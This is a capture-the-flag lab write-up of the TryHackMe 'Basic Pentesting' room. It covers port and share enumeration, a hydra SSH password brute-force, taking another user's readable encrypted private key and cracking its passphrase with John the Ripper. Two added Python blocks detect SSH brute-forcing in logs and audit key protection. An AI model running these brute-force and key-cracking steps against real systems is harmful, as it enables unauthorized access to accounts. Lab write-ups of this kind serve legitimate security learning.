TryHackMe Room: https://tryhackme.com/room/basicpentestingjt
This room requires that you know the following:
- SSH
- SMB Enumeration
- Web Directory Enumeration
- Brute Forcing & Hash Cracking
- Some basic privilege escalation
Personally, this room wasn’t too difficult, though I did get stuck on privilege escalation for a bit.
Enumeration #
nmap -sS -p- -v -oA nmap/initial $IP
Host is up, received echo-reply ttl 63 (0.15s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
8009/tcp open ajp13 syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
From this initial scan, we know which ports are open and have a rudimentary idea of which services they host.
In the above scan, I’ve highlighted some of the services for which we can also start scans to save some time.
Before we start scans for specific ports, we can run a second nmap scan to get more detailed information about the open ports.
nmap -sS -sC -sV -O -p 22,80,139,445,8009,8080 $IP
Now we can also start scans for the services highlighted above:
To find directories on the web server:
feroxbuster --url http://$IP -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o web_dirs --auto-tune -C 404
To enumerate Samba:
enum4linux $IP
While the scans are running, we can do some manual enumeration.
Manual Enumeration #
Loading up http://$IP:80, we can see the following maintenance notice.

We can try looking for a robots.txt file by visiting http://$IP/robots.txt

Here we can see some interesting information: we now know that the Apache version is 2.4.18, which will come into use later when we are looking for vulnerabilities.
Scan Results #
For the sake of brevity, I’ve cut out decent portions of the scan results and only kept what I consider to be interesting (though, considering I am learning too, I might leave out some silver bullet).
NMAP Scan Results:
Host is up, received echo-reply ttl 63 (0.15s latency).
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 syn-ack ttl 63 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.7
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 5.4 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-01-04T05:31:34
|_ start_date: N/A
|_clock-skew: mean: 1h40m00s, deviation: 2h53m14s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BASIC2<00> Flags: <unique><active>
| BASIC2<03> Flags: <unique><active>
| BASIC2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2024-01-04T00:31:36-05:00
Feroxbuster scan results:
200 GET 10l 24w 158c http://$IP/
200 GET 7l 42w 235c http://$IP/development/j.txt
200 GET 9l 89w 483c http://$IP/development/dev.txt
301 GET 9l 28w 318c http://$IP/development => http://$IP/development/

The user Jan seems to have weak credentials; we could attempt to brute force the password.

Enum4Linux Scan Results:
=================================( Share Enumeration on $IP )=================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on $IP
//$IP/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//$IP/IPC$ Mapping: N/A Listing: N/A Writing: N/A
==================( Users on $IP via RID cycling (RIDS: 500-550,1000-1050) )==================
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
We could log in to the Anonymous Samba share using smbclient; however, since it gave me no new information, I have omitted it.
Enumeration Summary #
- Users
  - Jan (Has weak credentials)
  - Kay
- Services: (Ubuntu Server)
  - Apache 2.4.18 (Port 80)
  - OpenSSH 7.2p2 (Port 22)
  - Samba 4.3.11 (Port 139 & 445)
  - Apache Tomcat 9.0.7 (Port 8080)
Research #
Before we check for vulnerabilities in the services, we can start SSH brute forcing for the user Jan to save some time.
hydra -l jan -P /usr/share/wordlists/rockyou.txt -f -v -V -t 4 $IP ssh
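From the defender's side, the hydra run above is loud in the target's auth.log. The following detector, an added example that is not code from the writeup, runs over constructed sshd log lines and flags a (source, user) pair that reaches a failure threshold inside a sliding window, plus the successful login that follows such a burst; the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines (not from the target): a burst of failed
# password attempts for one user from one source, then a success.
SAMPLE_AUTH_LOG = """\
Jan  5 06:40:01 basic2 sshd[1201]: Failed password for jan from 10.0.0.5 port 50211 ssh2
Jan  5 06:40:01 basic2 sshd[1202]: Failed password for jan from 10.0.0.5 port 50212 ssh2
Jan  5 06:40:02 basic2 sshd[1203]: Failed password for invalid user admin from 10.0.0.5 port 50213 ssh2
Jan  5 06:40:02 basic2 sshd[1204]: Failed password for jan from 10.0.0.5 port 50214 ssh2
Jan  5 06:40:03 basic2 sshd[1205]: Failed password for jan from 10.0.0.5 port 50215 ssh2
Jan  5 06:40:03 basic2 sshd[1206]: Failed password for jan from 10.0.0.5 port 50216 ssh2
Jan  5 06:40:04 basic2 sshd[1207]: Accepted password for jan from 10.0.0.5 port 50217 ssh2
Jan  5 06:41:30 basic2 sshd[1250]: Failed password for kay from 10.0.0.9 port 40100 ssh2
"""

# Matches the "Failed/Accepted password for [invalid user] USER from SRC" form.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def parse(log_text, year=2024):
    """Yield (timestamp, result, user, src) for each sshd password event."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]

def find_bruteforce(log_text, threshold=5, window_s=60):
    """Alert once when a (src, user) pair reaches `threshold` failures within
    `window_s` seconds, and again if that pair then logs in successfully:
    the second alert is the 'guessed password worked' case worth paging on."""
    failures = defaultdict(list)
    alerts = []
    for ts, result, user, src in parse(log_text):
        key = (src, user)
        if result == "Failed":
            # keep only failures still inside the sliding window
            recent = [t for t in failures[key] if (ts - t).total_seconds() <= window_s]
            recent.append(ts)
            failures[key] = recent
            if len(recent) == threshold:
                alerts.append(("bruteforce", src, user))
        elif len(failures[key]) >= threshold:
            alerts.append(("success_after_bruteforce", src, user))
    return alerts
```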
Apache 2.4.18 #
searchsploit Apache
Here we find a few results that may be useful later on:
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege escalation
Apache 2.4.x - Buffer Overflow
Apache 2.x - Memory Leak
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak
OpenSSH 7.2p2 #
searchsploit openssh
OpenSSH 7.2p2 - Username Enumeration
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation
Samba 4.3.11 #
searchsploit Samba
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)
Initial Access #

We can gain initial access using the bruteforced credentials:
ssh -l jan $IP
Privilege Escalation #
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 19 2018 .
drwxr-xr-x 24 root root 4096 Apr 23 2018 ..
drwxr-xr-x 2 root root 4096 Apr 23 2018 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay
jan@basic2:/home$ cd kay/
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
Not a lot to look at in the home directory. Surprisingly, the home folder for jan is owned by root, and we can only read and execute.
However, the .ssh directory has read access; if we find a private key, we could attempt to log in as user kay.
Score !!!
jan@basic2:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
[REDACTED]
-----END RSA PRIVATE KEY-----
Copying the key to our machine and setting proper permissions (chmod 400 id_rsa), we can now attempt to log in as user kay.
$ ssh 10.10.19.163 -l kay -i key
Enter passphrase for key 'key':
kay@10.10.19.163's password:
Permission denied, please try again.
kay@10.10.19.163's password:
Permission denied, please try again.
kay@10.10.19.163's password:
kay@10.10.19.163: Permission denied (publickey,password).
Sadly, the key is password protected. We can try to crack the key and, in the meantime, look at other privilege escalation vectors.
To crack the key, we can use John the Ripper. First we need to convert the SSH key to a hash, which we do with ssh2john.py:
python3 ssh2john.py id_rsa > id_rsa.hash
Once we have our hash, we can crack it using John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
The hash uses the MD5-based KDF (cost 0 in John's output below), and only took a few seconds to crack.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
******* (key)
1g 0:00:00:00 DONE (2024-01-05 06:52) 12.50g/s 1034Kp/s 1034Kc/s 1034KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
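The kay finding is two weaknesses stacked: a private key readable by another user, and legacy PEM encryption whose MD5-based, single-iteration KDF John cracks in seconds. The audit helper below, an added example rather than code from the writeup, classifies a key's on-disk protection from its headers (legacy PEM versus the openssh-key-v1 format with its bcrypt KDF) and checks whether a file mode exposes the key to other users; all key samples are constructed placeholders.

```python
import base64
import stat
import struct

# Constructed samples: only the PEM headers, or the leading openssh-key-v1
# fields, are meaningful; the key material is a placeholder.
LEGACY_ENCRYPTED = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
    "[PLACEHOLDER]\n-----END RSA PRIVATE KEY-----\n"
)
LEGACY_PLAIN = "-----BEGIN RSA PRIVATE KEY-----\n[PLACEHOLDER]\n-----END RSA PRIVATE KEY-----\n"

def _openssh_prefix(cipher, kdf):  # magic + ciphername + kdfname (constructed)
    pack = lambda b: struct.pack(">I", len(b)) + b
    return b"openssh-key-v1\x00" + pack(cipher) + pack(kdf)

def _pem(blob):
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"

OPENSSH_BCRYPT = _pem(_openssh_prefix(b"aes256-ctr", b"bcrypt"))
OPENSSH_PLAIN = _pem(_openssh_prefix(b"none", b"none"))

def classify_key(text):
    """Return (format, protection) read from the key's on-disk encoding."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        raw = base64.b64decode("".join(lines[1:-1]))
        if not raw.startswith(b"openssh-key-v1\x00"):
            return ("openssh", "unknown")
        pos, fields = 15, []
        for _ in range(2):  # ciphername, then kdfname
            (n,) = struct.unpack(">I", raw[pos:pos + 4])
            fields.append(raw[pos + 4:pos + 4 + n].decode())
            pos += 4 + n
        cipher, kdf = fields
        return ("openssh", "unencrypted" if cipher == "none" else f"{kdf}-kdf")
    # Legacy PEM "Proc-Type: 4,ENCRYPTED": OpenSSL MD5 KDF, 1 iteration (John cost 0)
    if any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines):
        return ("legacy-pem", "md5-kdf")
    return ("legacy-pem", "unencrypted")

def readable_by_others(mode):
    """True when group or world can read the file; kay's key was readable by jan."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))
```

Re-encrypting a legacy key in the OpenSSH format (ssh-keygen -p -o) moves it from the md5-kdf class to the bcrypt-kdf class, which is the remediation this check points at.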
Using the cracked SSH key password, we can log in as the user kay.
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
********************************************************
After logging in, we can read the pass.bak file and complete the room.
Self Review #
This is the section where I analyze my own methodology, look at other writeups, find what I might have missed and do my best to learn from these mistakes.
After reading several writeups, here are the ones that were useful:
- https://medium.com/@JAlblas/tryhackme-basic-pentesting-walkthrough-9a1821f1d7c6
  - Source code on the maintenance post has comments which I missed.
  - vim has the SUID bit.
- https://www.scioshield.uk/thm-basic-pentesting/
  - Jserv vulnerability
  - Incredibly detailed for Red Teaming & Blue Teaming